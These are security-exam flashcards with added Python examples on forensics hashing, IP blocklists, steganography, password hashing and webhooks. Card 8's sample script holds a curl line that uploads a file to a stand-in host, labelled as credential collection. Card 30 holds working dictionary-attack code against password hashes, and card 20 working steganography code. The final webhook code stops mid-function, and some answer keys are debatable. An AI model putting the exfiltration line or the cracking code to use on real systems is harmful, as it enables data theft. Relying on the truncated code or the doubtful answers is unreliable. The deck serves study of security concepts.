Deck3 Flashcards

1
Q

A hacktivist group claims responsibility for infecting a manufacturer’s systems by planting an infected USB drive at the company’s office. The manufacturer’s distributor, several vendors, and hundreds of customers were all eventually infected with the malware that stole important credential information.

Which term describes this attack strategy?

A)Cloud-based
B)Direct access
C)Supply-chain
D)Social media

A

A supply-chain attack is not an attack on a target directly but on a more vulnerable company or resource within its supply chain that helps the organization conduct business or create a product. An increasing number of hacks are being carried out this way.

Direct access is the most straightforward type of attack and usually the most preventable. It is a physical or local attack, such as an attacker exploiting an unlocked workstation and using a boot disk to install malicious tools or simply stealing a device.

In a cloud-based attack, hackers may try and exploit vulnerabilities in cloud-based web service providers to gain access to a tenant organization’s data.

Social media attacks occur when malware is attached to social media posts or presented as downloads on social media sites. At their most dangerous, hackers can make it so a compromised site automatically infects a vulnerable computer.

2
Q

In order to log onto a system, you must first complete a CAPTCHA, then enter a code that is sent to your cell phone via SMS. What is that code an example of?

A)Passwordless
B)Cloud access security broker
C)Multi-factor authentication
D)Single sign-on

A

Passwordless authentication replaces the memorized password with something the user has or is: hardware tokens, smart cards, biometrics, or a one-time code sent to a registered phone. In this scenario the SMS code is the only credential presented, so the logon is passwordless rather than multi-factor: a CAPTCHA only shows that a human is present and is not an authentication factor, and no password or other second factor is used alongside the code. Note that codes delivered over SMS are the weakest kind of one-time code, because they can be intercepted through SIM swapping or attacks on the carrier network.

3
Q

CASB

A

A cloud access security broker (CASB) is a checkpoint where security policies are enforced, located between an organization’s users and its cloud providers. A CASB can ensure cloud security by comparing users, applications, and devices against multiple security policies.

4
Q

In security operations, which of the following would provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness?

A)Windows registry
B)Logging levels
C)System processes
D)System hardening

A

System processes provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness, to name a few. A Security Operations Center (SOC) operates 24x7 to maintain the organization's security posture, and these system processes are the guidelines the SOC follows in its day-to-day operations.

5
Q

Windows Registry?

A

The Windows registry is a database that contains all the application settings and current configuration parameters for the hardware and software on a Windows system. Each machine running a Windows OS has a registry that contains keys (which identify applications, processes, hardware) and values (specific configuration data related to the key). For example, if a key was related to a printer, values associated with the key could include printing orientation, print history, default paper tray, and default paper size.

The Windows OS uses the registry database for storing all configuration settings. In Linux, each application and service typically has its own configuration file; system-wide configuration files live under the /etc/ directory.

Hardware architecture is also an important concept. If the hardware is not secure, it would be very difficult to build secure applications and databases and to have high availability. Physical access to critical hardware, such as servers, routers, wireless access points, and network switches, is often overlooked. It is not uncommon that administrative passwords are set to the default, firmware does not get updated, and encryption is not adequate for the device.

6
Q

Which of the following has a Policy Engine, a Policy Administrator, and a Policy Enforcement Point?

A)Personally identifiable information (PII)
B)Cardholder data
C)Data loss prevention
D)Zero trust

A

Zero-trust architecture, as described in NIST SP 800-207, consists of a Policy Engine (PE), a Policy Administrator (PA), and one or more Policy Enforcement Points (PEPs). The goal of zero trust is to continuously evaluate the authentication and authorization of devices, users, and processes instead of trusting anything because of its network location. The PE decides whether to grant or deny access to a resource, based primarily on policy but also on inputs such as threat intelligence and device posture. The PA executes that decision by opening or shutting down the communication path from the requestor to the resource, which it does by signalling the PEP. The PEP sits in the data path and enables, monitors, and eventually terminates the connection.

7
Q

Your company is governed by several regulations that state that you must use automated systems that provide CCE and CVE identifiers for vulnerability scans. Which of the following should you implement?

A)SCAP
B)SIEM
C)NAC
D)SNMP

A

You should implement Security Content Automation Protocol (SCAP), which provides Common Configuration Enumeration (CCE) and Common Vulnerabilities and Exposures (CVE) identifiers.

8
Q

The team is analyzing a shell script that was run on a server. How can they recognize comments in the script?

A)line starts with a #
B)line starts with $
C)line start with a !
D)line starts with a @

A

Comments are ignored by the shell. They begin with the hash symbol (#) and run to the end of the line. A comment can also follow a command on the same line as long as the # is preceded by whitespace; a # inside quotes, or in $#, is not a comment. The #! on the first line (the shebang) is read by the kernel to pick the interpreter, but to the shell it is still a comment.

The exclamation mark (!) negates a test or a command's exit status, and != is the not-equal comparison: it returns true when the two operands differ and false otherwise.

The dollar sign ($) introduces variable and parameter expansion. The exit status of the last executed command is held in $?; $ on its own does not return anything.

The at symbol (@) combined with $ gives $@, which expands to all of the positional parameters passed to the script.
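When a team reviews a recovered script, the useful question is not "does the line start with #" but "which part of each line did the shell actually execute". The following classifier is an added example for this card, not code from the original deck; the sample script inside it is constructed and points at a reserved example host. It tracks quotes and escapes so a # inside a string, in $#, or in ${#var} is kept as code, and reports only real comments.

```python
"""Separate comments from code in a POSIX shell script.

Added example for this deck; SAMPLE_SCRIPT is constructed, not from a real
incident. A comment starts at a '#' that begins the line or follows unquoted
whitespace. A '#' inside quotes, in '$#' or in '${#var}' is not a comment.
"""

SAMPLE_SCRIPT = """\
#!/bin/sh
# Collect credentials from the host  (comment)
TARGET="/tmp/out#1"          # the '#' in quotes is data, not a comment
if [ "$#" != 0 ]; then        # $# is the argument count; != compares strings
    echo "args: $@"           # $@ expands to every positional parameter
fi
curl -s http://example.invalid/up -d @"$TARGET"
echo "exit status of curl: $?"
"""


def split_comment(line: str) -> tuple:
    """Return (code, comment) for one line of POSIX shell.

    Tracks single and double quotes so a '#' inside a string stays code, and
    only treats '#' as a comment start at column 0 or after whitespace (so
    '$#' and '${#x}' stay code). Backslash escapes are honoured outside
    single quotes.
    """
    in_single = in_double = False
    i = 0
    while i < len(line):
        ch = line[i]
        if ch == "\\" and not in_single:
            i += 2          # skip the escaped character
            continue
        if ch == "'" and not in_double:
            in_single = not in_single
        elif ch == '"' and not in_single:
            in_double = not in_double
        elif ch == "#" and not in_single and not in_double:
            if i == 0 or line[i - 1].isspace():
                return line[:i].rstrip(), line[i:]
        i += 1
    return line.rstrip(), ""


def comments_in(script: str) -> list:
    """(line number, comment text) for every line carrying a comment.
    The shebang is reported too: the kernel reads it, the shell ignores it."""
    found = []
    for n, line in enumerate(script.splitlines(), start=1):
        _, comment = split_comment(line)
        if comment:
            found.append((n, comment))
    return found


if __name__ == "__main__":
    for n, c in comments_in(SAMPLE_SCRIPT):
        print(f"{n:3}: {c}")
```

Run against the sample, it reports lines 1 to 5 as carrying comments and leaves the curl and echo lines, including the $? expansion, as code.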

9
Q

Obtaining which of the following can reduce the likelihood of purchasing counterfeit equipment?

A)Fingerprint
B)OEM documentation
C)SLA
D)Hash value

A

One of the ways you can reduce the likelihood of purchasing counterfeit equipment is to insist on the inclusion of verifiable original equipment manufacturer (OEM) documentation. In many cases, this paperwork includes anti-counterfeiting features. Make sure you use the vendor website to verify all of the various identifying numbers in the documentation.

10
Q

You have quarantined an instance of malware and would like to execute the payload to see what it does without spreading it through the network. What tool or process could be used to do this safely?

A)Cuckoo Sandbox
B)email header analysis
C)DKIM
D)pattern recognition

A

Cuckoo Sandbox is used to investigate suspicious files or websites. It not only analyzes files and websites but also traces API calls, dumps any related network traffic, and analyzes the processes running in memory. When you execute a malicious payload in a sandbox, the sandbox allows it to run while preventing the spread of any activity generated by the malicious payload.

11
Q

You are a cyber security analyst. Your organization has several products and services implemented within their IT environment. Management finds it difficult to view security and operational metrics for all the products. You recommend that management approve implementing single pane of glass solution to resolve the visibility issue.

Which of the following statements is NOT true of implementing a single pane of glass solution?

A)It increases efficiency by eliminating the need to switch back and forth between separate IT operations management solutions.
B)It provides an easy-to-navigate GUI.

C)It provides a centralized display of security and operational metrics that is readily available to management.

D)It displays and sends data in real time from the centralized application whenever relevant events occur in the environment.

A

A single pane of glass solution does not display and send data in real time when relevant events occur in the environment. You would implement webhooks in an application to display and send data in real time when a relevant event occurs in the environment. Webhooks can be leveraged to automate certain workflows.

A single pane of glass solution provides a single management console that displays data from multiple sources. The glass in the term “single pane of glass” refers to a computer monitor or mobile screen where users can view meaningful data from multiple sources.

12
Q

You are assisting a senior forensics investigator with a crime scene. While you are watching, he runs the following command:

user@kaplan:~# md5sum /dev/pw3

He receives the following output:

9b98b637a132974e41e3c6ae1fc9fc96 /dev/pw3

What is the long string of values in the output called?

A)Initialization vector
B)Hash value
C)Salt value
D)Encryption key

A

That value is a hash value (message digest), produced by running the contents of the block device /dev/pw3 through the MD5 algorithm. The digest depends on every byte of the file or volume it was computed over, so it gives a way to determine later whether that file or volume has changed. To validate an image, a hash is generated for both the original and the copy; if the hashes match, the images are identical. Both hashes should be recorded in the forensic log for the investigation. MD5 is deprecated for security use because collisions can be manufactured, so current practice is to record a SHA-256 (or stronger) digest as well, keeping MD5 only for comparison with older reports.

It is not an encryption key. Encryption keys are used to encipher a message. MD5 does not perform encryption. It generates a value that can be used to determine the integrity of the file or volume.

It is not an initialization vector (IV). These are values used within certain encryption algorithms to add randomness to the calculations to prevent patterns in the output that can be used to reverse-engineer the encryption key.

A salt value is random data that is used as an additional input to a one-way function that “hashes” a password or passphrase. It is used to make cracking the hash more difficult.
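What the investigator's md5sum command does, written out so the steps are visible: hash a device or image in fixed-size chunks (a multi-gigabyte image must never be read into memory at once), compute MD5 and SHA-256 in the same pass, and accept a copy only when every recorded digest matches. This is an added example, not from the card; the "device" is a constructed temporary file rather than a real block device.

```python
"""Hash a disk image in chunks and verify a copy against the original.

Added example, not from the original card. md5sum in the card hashes a whole
block device; hashlib does the same here over a file. Because MD5 collisions
can be manufactured, MD5 is recorded only for comparison with older reports
and SHA-256 is recorded alongside it; a copy is accepted only when both match.
"""
import hashlib
import os
import tempfile

CHUNK = 1024 * 1024             # 1 MiB reads: images do not get loaded into RAM
ALGORITHMS = ("md5", "sha256")


def _digest_chunks(chunks, algorithms=ALGORITHMS) -> dict:
    """Feed every chunk to every hasher in one pass; {name: hexdigest}."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for chunk in chunks:
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data: bytes) -> dict:
    return _digest_chunks([data])


def hash_file(path: str) -> dict:
    """Works on a regular file or a block device such as /dev/sdb."""
    with open(path, "rb") as fh:
        return _digest_chunks(iter(lambda: fh.read(CHUNK), b""))


def verify_image(original: str, copy: str) -> tuple:
    """(identical, digests): both digest sets belong in the case log."""
    orig = hash_file(original)
    dup = hash_file(copy)
    identical = all(orig[a] == dup[a] for a in ALGORITHMS)
    return identical, {"original": orig, "copy": dup}


def demo() -> tuple:
    """Constructed data: a 3 MiB fake device, an exact copy, and a copy with a
    single flipped bit. Returns (exact_copy_verified, tampered_copy_verified)."""
    data = bytes(range(256)) * (3 * 1024 * 4)          # 3 MiB, deterministic
    with tempfile.TemporaryDirectory() as d:
        src, good, bad = (os.path.join(d, n) for n in ("dev", "good.dd", "bad.dd"))
        with open(src, "wb") as f:
            f.write(data)
        with open(good, "wb") as f:
            f.write(data)
        with open(bad, "wb") as f:
            # flip one bit in the second chunk so only the digests reveal it
            f.write(data[:CHUNK] + bytes([data[CHUNK] ^ 0x01]) + data[CHUNK + 1:])
        return verify_image(src, good)[0], verify_image(src, bad)[0]


if __name__ == "__main__":
    print(hash_bytes(b"abc"))
    print(demo())
```

The single flipped bit in the tampered copy is invisible to a size check but changes both digests entirely, which is the property the investigator relies on when the image is produced in court.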

13
Q

Which network architecture concept allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents?

A)Secure Access Service Edge
B)Hybrid
C)Software-defined networking
D)On-premises

A

Software-defined networking (SDN) allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents.

On-premises network architecture allows an organization to maintain control of its architecture and resources by hosting it on-site. With on-premises, the organization can also host a private cloud on its hardware.

Hybrid cloud architecture is an environment where some workloads run in a public cloud and some in a private cloud. A public cloud lets an organization rent capacity (much like a tenant in an office building) from a provider's Internet-accessible data center, place resources there, and configure access to them. A private cloud is cloud infrastructure dedicated to a single tenant, whether hosted on the organization's own hardware or by a provider.

Secure Access Service Edge (SASE) is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

14
Q

Your organization’s reputation is staked on a book it publishes yearly. When you perform data classification, how should you classify this book and its contents?

A)intellectual property
B)corporate confidential data
C)PHI
D)personally identifiable information

A

Intellectual property is a tangible or intangible asset to which the owner has exclusive rights. Intellectual property law is a group of laws that recognizes exclusive rights for creations of the mind. This includes books and music.

15
Q

Which of the following network architecture concepts consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement point?

A)Hybrid
B)Zero-trust
C)Cloud
D)Secure Access Service Edge

A

Zero-trust architecture, as described in NIST SP 800-207, consists of a Policy Engine (PE), a Policy Administrator (PA), and one or more Policy Enforcement Points (PEPs). The goal of zero trust is to continuously evaluate the authentication and authorization of devices, users, and processes instead of trusting anything because of its network location. The PE decides whether to grant or deny access to a resource, based primarily on policy but also on inputs such as threat intelligence and device posture. The PA executes that decision by opening or shutting down the communication path from the requestor to the resource, which it does by signalling the PEP. The PEP sits in the data path and enables, monitors, and eventually terminates the connection.

16
Q

You are a cyber security consultant for your company. Developers are creating an e-commerce application with a trial version and a paid version. You must recommend a solution that will automatically update the user’s trial subscription to the paid version once the user makes the purchase and the payment is processed.

Which solution should you recommend?

A)Integrate webhooks that will update the user’s trial version to the premium version.

B)Integrate plugins that will update the user’s trial version to the premium version.

C)Integrate an API that will update the user’s trial version to the premium version.

D)Integrate applets that will update the user’s trial version to the premium version.

A

You should recommend integrating webhooks. The payment processor sends an HTTP POST to an endpoint in the application whenever a payment event occurs, and the application's handler upgrades the trial subscription when the event reports a successful payment. Failed payments and expired checkout sessions arrive as different events (or not at all) and must not trigger the upgrade. Because that endpoint accepts inbound requests from the Internet, the handler must verify the processor's signature on every message before changing anything; otherwise anyone who learns the URL can post a fake "payment succeeded" event and upgrade an account for free.

17
Q

You have observed that your network has fended off breach attempts from the same IP address several times recently. Which of the following could you use to address the issue?

A)Strings
B)AbuseIPDB
C)VirusTotal
D)Joe Sandbox

A

AbuseIPDB is a project dedicated to helping combat hackers, spammers, and abusive activity on the Internet by providing a central blacklist where webmasters, system administrators, and other interested parties can report and look up IP addresses associated with malicious activity. Whereas a WHOIS lookup returns registration data for a domain or address range, AbuseIPDB reports on individual IP addresses and ranges with a bad reputation for hacking attempts or other malicious behavior. A repeat offender that appears there is a candidate for a perimeter block rule and for a report back to the database; confirm first that the address is not a shared gateway (corporate NAT, carrier-grade NAT, VPN egress) whose other users you would also be blocking.
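The operational step after consulting a reputation service is to match your own firewall records against the listed addresses and decide what to block. The following is an added example, not from the card: both the blocklist and the log lines are constructed (the addresses come from the RFC 5737 documentation ranges), standing in for an AbuseIPDB export and a perimeter firewall log.

```python
"""Match firewall log source addresses against an IP reputation blocklist.

Added example, not from the card. BLOCKLIST and FIREWALL_LOG are constructed;
a real list would come from an AbuseIPDB export or API query. Entries are
parsed with the ipaddress module so single hosts and CIDR ranges both work.
"""
import ipaddress
import re
from collections import Counter

BLOCKLIST = [               # constructed; RFC 5737 documentation ranges
    "198.51.100.0/24",
    "203.0.113.77",
]

FIREWALL_LOG = """\
2024-05-01T02:14:07Z DENY TCP src=203.0.113.77:51234 dst=192.0.2.10:22
2024-05-01T02:14:09Z DENY TCP src=203.0.113.77:51235 dst=192.0.2.10:22
2024-05-01T02:15:41Z DENY TCP src=198.51.100.23:4433 dst=192.0.2.10:445
2024-05-01T02:16:02Z ALLOW TCP src=192.0.2.55:60001 dst=192.0.2.10:443
2024-05-01T02:17:30Z DENY TCP src=203.0.113.9:2222 dst=192.0.2.10:22
"""

SRC_RE = re.compile(r"\bsrc=(\d{1,3}(?:\.\d{1,3}){3}):\d+")


def load_blocklist(entries) -> list:
    """Parse hosts and CIDR ranges; strict=False tolerates host bits set."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def listed(addr: str, networks) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in networks)


def flagged_sources(log: str, networks) -> dict:
    """Listed source addresses seen in the log, with a hit count each."""
    hits = Counter()
    for line in log.splitlines():
        m = SRC_RE.search(line)
        if m and listed(m.group(1), networks):
            hits[m.group(1)] += 1
    return dict(hits)


if __name__ == "__main__":
    nets = load_blocklist(BLOCKLIST)
    for ip, count in flagged_sources(FIREWALL_LOG, nets).items():
        print(f"{ip}: {count} listed connection attempt(s)")
```

On the sample log this flags 203.0.113.77 twice and 198.51.100.23 once (it falls inside the listed /24); 203.0.113.9 also probed SSH but is not on the list, so it would go through the normal review path rather than an automatic block.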

18
Q

Which of the following is NOT a consideration when establishing the confidence level in the findings of a vulnerability scan?

A)accuracy of scan results
B)relevance of scan results
C)cost of scan results
D)timeliness of scan results

A

While it is true that security initiatives, such as a vulnerability scan, must create value that exceeds the cost, the cost of obtaining the scan results is not a consideration when establishing the confidence level in the findings.

The accuracy of the results is perhaps the most important consideration when establishing the confidence level. Inaccurate results can lead to wasted effort on noncritical issues, while more critical issues are left unaddressed.

The relevance of the results is also a consideration when establishing the confidence level, because in some cases results indicate an issue that, while technically present, does not apply. For example, a missing patch for SQL Server is irrelevant when the organization uses Oracle.

Finally, the timeliness of the results is a consideration. Older results may describe findings that have since been remediated, or miss changes made to the environment after the scan, so recent results reflect the current state more reliably and leave more time to react to a newly introduced issue.

19
Q

Which research source can help in discovering new vulnerabilities and potential threats in existing Internet standards?

A)TTPs
B)STIX
C)TAXII
D)RFCs

A

A Request for Comments (RFC) is issued when a new technology or practice is proposed for the Internet, and it represents a call for peer review on the subject. RFCs are published by the RFC Editor on behalf of the Internet Engineering Task Force (IETF) and its sister bodies (the IRTF and IAB) and as independent submissions; most Internet protocol standards, and the security-considerations sections that discuss their weaknesses, are found there.

20
Q

An organization recently suffered a data breach. When the issue was investigated, the organization found that a disgruntled employee concealed product release dates within an image file he sent to someone else. What is this process called?

A)double tagging
B)masquerading
C)data exfiltration
D)steganography

A

Steganography is the process of hiding data inside an innocuous carrier file. In the common image-based form, a few bits of each pixel (typically the least significant bits) are replaced with bits of the data to be hidden. This swapping does not have a noticeable effect on the graphic, but it allows the sender to hide data that can be extracted later with the same tool used to insert it. The best defense against steganography is to periodically scan PCs for questionable software; the presence of steganography software on any system should be prohibited unless it is specifically required for business purposes.
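The embed-and-extract procedure described above, as an added example that is not part of the card. To keep it self-contained the "image" is a constructed buffer of 8-bit samples rather than a real PNG (no imaging library is needed), and the hidden text is invented; the technique on real pixel data is identical. Each sample changes by at most one level out of 255, which is why the carrier looks unchanged.

```python
"""LSB steganography on a raw sample buffer.

Added example, not from the card. COVER is a constructed, deterministic
buffer of 8-bit 'pixel' values and SECRET is invented. embed() overwrites
the least significant bit of successive samples with the payload bits,
after a 4-byte length header so extract() knows where to stop.
"""
import random

_rng = random.Random(7)                                   # fixed seed: reproducible cover
COVER = bytes(_rng.getrandbits(8) for _ in range(4096))   # constructed 'image' data
SECRET = b"release date: 2025-03-14"                      # constructed payload


def _to_bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, payload: bytes) -> bytes:
    """Hide payload (prefixed with a 4-byte big-endian length) in cover's LSBs."""
    message = len(payload).to_bytes(4, "big") + payload
    if len(message) * 8 > len(cover):
        raise ValueError("payload too large for cover")
    out = bytearray(cover)
    for i, bit in enumerate(_to_bits(message)):
        out[i] = (out[i] & 0xFE) | bit      # clear the LSB, then set it to the payload bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length header, then that many bytes, back out of the LSBs."""
    def read_bytes(offset: int, count: int) -> bytes:
        result = bytearray()
        for b in range(count):
            value = 0
            for k in range(8):
                value = (value << 1) | (stego[offset + b * 8 + k] & 1)
            result.append(value)
        return bytes(result)

    length = int.from_bytes(read_bytes(0, 4), "big")
    if length * 8 + 32 > len(stego):
        raise ValueError("length header does not fit the buffer: not our format")
    return read_bytes(32, length)


def max_sample_change(cover: bytes, stego: bytes) -> int:
    """Largest per-sample difference introduced by embedding (1 for LSB)."""
    return max(abs(a - b) for a, b in zip(cover, stego))


if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    print("recovered:", extract(stego))
    print("max change per sample:", max_sample_change(COVER, stego))
```

The cover here is random, which is the hardest case for visual detection; on a real photograph the same one-level changes are equally invisible, which is why defenders look for the stego tool rather than for the altered images.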

21
Q

Several of the systems you manage are displaying odd behavior. You are trying to determine if the issue is host-related or application-related. Which of the following is a host-related issue?

A)anomalous activity
B)introduction of new accounts
C)unexpected output
D)registry changes

A

Changes to the registry, or anomalies in the registry settings, are a host-related issue, because these settings affect the entire system rather than a single application.

22
Q

Your company needs to ensure that all devices connecting to the network are prevented from introducing malware and other vulnerabilities into the network. This includes deploying patch management for systems and applications and hardening systems. What technique are you implementing?

A)System isolation
B)Endpoint security
C)Network segmentation
D)Sinkholes

A

You are implementing endpoint security. Endpoint security involves protecting the endpoints (workstations, printers, and so on) in the network, including protecting them from other endpoints that spend at least some of the time outside the LAN. This is done by verifying patches and updates before the device is allowed access to the network. Endpoint security also includes the process of hardening endpoints.

23
Q

Which process allows you to deploy, configure, and manage data centers through scripts?

A)Waterfall
B)IaC
C)Agile
D)Immutable systems
E)Baselining

A

Infrastructure as code (IaC) is the process of using definition and configuration files to provision and manage data centers. Automating this process through scripts can ensure that there is more control and less opportunity for error when deploying servers, as compared with manual configuration. IaC is the foundation for Secure DevOps. Secure Development Operations (Secure DevOps) means that security is built into all your development operations.

24
Q

Which of the following is NOT associated with public key infrastructure (PKI)?

A)Certificate store
B)Registration authority
C)Certificate authority
D)Single sign-on

A

Single sign-on (SSO) is not associated with PKI. It is a process that allows users to log on once to the network and thereafter not be required to issue another password to access resources.

Certificate authority (CA) is an element of PKI. The CA validates the entities identified in the certificate.

The registration authority (RA) handles certificate requests. The RA verifies the identity of the requester and, once satisfied, forwards the request to the CA, which issues the certificate.

The certificate store is used by applications running on a system to retrieve stored certificates, certificate trust lists, and certificate revocation lists.

Another element of PKI is the certificate database. This database stores information about the certificate, as well as the validity status and the validity period.

25
Q

Your company has engaged with a threat intelligence sharing organization. In which of the following areas would you identify and share your controls chosen to address issues?

A)vulnerability management
B)security engineering
C)incident response
D)detection and monitoring
E)risk management

A

Part of risk management is identifying mitigations, called controls, to address issues. Examples of the types of controls are:

Preventative controls: controls that stop something from occurring, such as locks.

Managerial controls: controls that specify acceptable practices within an organization, such as acceptable use policies.

Corrective controls: controls put in place to reduce the effect of an attack or other undesirable event, such as backups.

26
Q

Which of the following vulnerabilities is characterized by a user modifying a browser’s security settings to make it more convenient to visit websites?

A)Misconfiguration/weak configuration
B)Improper input handling
C)Improper error handling
D)Default configuration

A

If a user modifies a browser’s security settings to make it more convenient to visit websites, such as turning off pop-up blockers and anti-phishing controls, this is an example of a weak configuration. Misconfiguration and weak configurations can have a severe impact on the entire organization. Misconfiguration, such as not changing the default administrative user name or password, can also have a significant impact.

27
Q

Which of the following provides extra layers of security for administrator accounts and service accounts?

A)Passwordless
B)Federation
C)Privileged access management
D)Cloud access security broker

A

Privileged access management (PAM) is a process that provides extra protection for roles above the level of regular users, such as an administrator or a service account. If an account that is assigned special access is compromised, that breach can have a more significant impact than a breach of a regular user’s account.

28
Q

Which of the following has Firewall as a Service (FWaaS) as a component?

A)Network segmentation
B)Secure Access Service Edge
C)Software-defined networking
D)On-premises

A

Secure Access Service Edge (SASE) has Firewall as a Service (FWaaS) as one of its components. Other components include secure web gateways (SWG), a cloud access security broker (CASB), and zero trust network access (ZTNA). SASE is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

29
Q

You are assembling tools that you need in your job as a security analyst. You must include a forensic suite tool. Which of the following will satisfy this requirement?

A)DD
B)Burp Suite
C)FTK
D)ZAP

A

FTK will satisfy the requirement of needing a forensic suite tool.

Burp Suite and Zed Attack Proxy (ZAP) are interception proxy tools. Another interception proxy tool is Vega.

DD is an imaging tool. While this type of tool is considered a forensics tool, it does not provide a forensic suite because it performs only one function, which is imaging.

30
Q

Your team has begun using user behavior analysis to identify potential malicious activity. Which of the following is NOT an example of behavior that might be uncovered using this technique?

A)communication attempts from unusual geographic locations
B)editing of user groups
C)user activity at odd hours
D)breaking the key on a hashed password

A

User behavior analysis and analytics will be of no help when an attacker recovers a password from its hash, because that work happens offline: the stolen hash is a message digest generated with an algorithm such as SHA, and no login, group change or odd-hour activity occurs until the attacker has the password. A hash cannot be turned directly back into the password, but the attacker can keep hashing candidate passwords until one produces the same digest. Salting each password and using a deliberately slow hash (bcrypt, scrypt, Argon2, PBKDF2) are what make that search expensive.

Any abnormal user behavior can be evidence of a system compromise. Examples include:

Editing of user groups or other abnormal account activity
Communication attempts from unusual geographic locations or impossible travel
User activity at odd hours
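The guessing process described above, as an added example that is not part of the card. The "leaked" hashes are constructed from a toy password list, and the salt is a fixed constructed value. The example shows the same dictionary attack against an unsalted SHA-256 hash, against a salted one, and then why a slow key-derivation function raises the cost of every guess.

```python
"""Dictionary attack against password hashes: unsalted, salted, and slow.

Added example, not from the card. WORDLIST, SALT and the 'leaked' hashes
are constructed. Nothing here touches a network or a live system, which is
exactly why behaviour analytics cannot see it happening.
"""
import hashlib
from typing import Optional

WORDLIST = ["password", "letmein", "Summer2024!", "correcthorse", "qwerty"]
SALT = bytes.fromhex("8f1e3a77c2b04d19")        # constructed per-user salt
ITERATIONS = 100_000                             # PBKDF2 work factor (assumed)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def crack_unsalted(target_hex: str, wordlist=WORDLIST) -> Optional[str]:
    """One hash per candidate, and the table is reusable for every victim."""
    table = {sha256_hex(w.encode()): w for w in wordlist}    # precomputed once
    return table.get(target_hex)


def crack_salted(salt: bytes, target_hex: str, wordlist=WORDLIST) -> Optional[str]:
    """A per-user salt forces the whole wordlist to be re-hashed per target."""
    for w in wordlist:
        if sha256_hex(salt + w.encode()) == target_hex:
            return w
    return None


def slow_hash(salt: bytes, password: str, iterations: int = ITERATIONS) -> str:
    """PBKDF2-HMAC-SHA256: each guess now costs `iterations` hash operations."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def verify_slow(salt: bytes, password: str, stored_hex: str) -> bool:
    return slow_hash(salt, password) == stored_hex


def demo() -> tuple:
    """Returns (unsalted result, salted result, unsalted table vs salted hash)."""
    leaked_unsalted = sha256_hex(b"Summer2024!")
    leaked_salted = sha256_hex(SALT + b"Summer2024!")
    return (
        crack_unsalted(leaked_unsalted),          # found with the shared table
        crack_salted(SALT, leaked_salted),        # found, but only after re-hashing
        crack_unsalted(leaked_salted),            # precomputed table is useless here
    )


if __name__ == "__main__":
    print(demo())
    stored = slow_hash(SALT, "correcthorse")
    print("slow verify:", verify_slow(SALT, "correcthorse", stored))
```

With five candidates all three searches finish instantly; the difference shows at scale, where the unsalted table costs one hash per word for the whole breach, the salted search costs one hash per word per user, and the PBKDF2 variant multiplies each of those by the iteration count.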

31
Q

You are a cyber security consultant in your company. You are educating developers regarding the use of webhooks when developing applications.

Which of the following scenarios would not be a suitable use for webhooks?

A)Automatically forwarding customer payments from an e-commerce platform to the accounting department

B)Deleting or updating data on other systems or databases.

C)Sending an email to a developer to request a fix for a non-urgent issue.

D)Notifying the customer support team when customers raise a payment dispute

A

Webhooks would not be suitable for deleting or updating data on other systems or databases. An API is the interface of the application that permits other programs or applications to request, input, delete, or update data in the application. A webhook uses an HTTP POST message to communicate from one application’s API to another application’s API. The communication is triggered in response to a user-defined event that occurs in the webhook’s application.

APIs and webhooks are used to accomplish similar goals, but in different ways. While APIs programmatically direct an entity to create an order, webhooks inform an API that an event has occurred. The message is used to trigger an action in response, such as sending an email or creating a calendar event.
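A receiver for the webhook scenario in cards 16 and 31, as an added example that is not from the deck or from any real payment processor. The header names, the "payment.succeeded" event name and the signature scheme (HMAC-SHA256 over the timestamp and raw body with a shared secret) are assumptions modelled on common processor APIs. It demonstrates the point both cards leave implicit: a webhook is an unauthenticated inbound HTTP POST, so the receiver must verify the signature, reject stale messages and ignore replays before it changes anyone's subscription.

```python
"""Webhook receiver for a payment processor's 'payment succeeded' event.

Added example, not from the deck. Header names, event names and the
signature scheme (HMAC-SHA256 over "<timestamp>.<raw body>") are assumed,
modelled on common processor APIs. demo() builds a constructed exchange.
"""
import hashlib
import hmac
import json
from typing import Optional
import time

TOLERANCE_SECONDS = 300          # reject signed messages older than 5 minutes


def sign(body: bytes, secret: bytes, timestamp: int) -> str:
    """Producer side: the value the processor would place in X-Signature."""
    mac = hmac.new(secret, f"{timestamp}.".encode() + body, hashlib.sha256)
    return mac.hexdigest()


class SubscriptionWebhook:
    def __init__(self, secret: bytes):
        self.secret = secret
        self.plans = {}             # user_id -> "trial" | "paid"
        self.seen_events = set()    # processed event ids (idempotency / replay)

    def handle(self, headers: dict, body: bytes, now: Optional[int] = None) -> tuple:
        """Return (HTTP status, message) for one inbound POST."""
        now = int(time.time()) if now is None else now
        try:
            ts = int(headers.get("X-Signature-Timestamp", ""))
        except ValueError:
            return 400, "missing timestamp"
        if abs(now - ts) > TOLERANCE_SECONDS:
            return 400, "stale timestamp"
        expected = sign(body, self.secret, ts)
        provided = headers.get("X-Signature", "")
        if not hmac.compare_digest(expected.encode(), provided.encode()):  # constant time
            return 401, "bad signature"
        try:
            event = json.loads(body)
        except json.JSONDecodeError:
            return 400, "invalid JSON"
        event_id = event.get("id")
        if event_id in self.seen_events:
            return 200, "duplicate ignored"       # processors retry; stay idempotent
        self.seen_events.add(event_id)
        if event.get("type") == "payment.succeeded":
            user = event["data"]["user_id"]
            self.plans[user] = "paid"
            return 200, f"{user} upgraded"
        return 200, "no action"                   # payment.failed, session.expired, ...


def demo() -> dict:
    """Constructed exchange: genuine event, replay, failed payment, forged
    message without a signature, and a stale message. Returns the responses
    and the resulting plan table."""
    secret = b"whsec_constructed_example_secret"
    hook = SubscriptionWebhook(secret)
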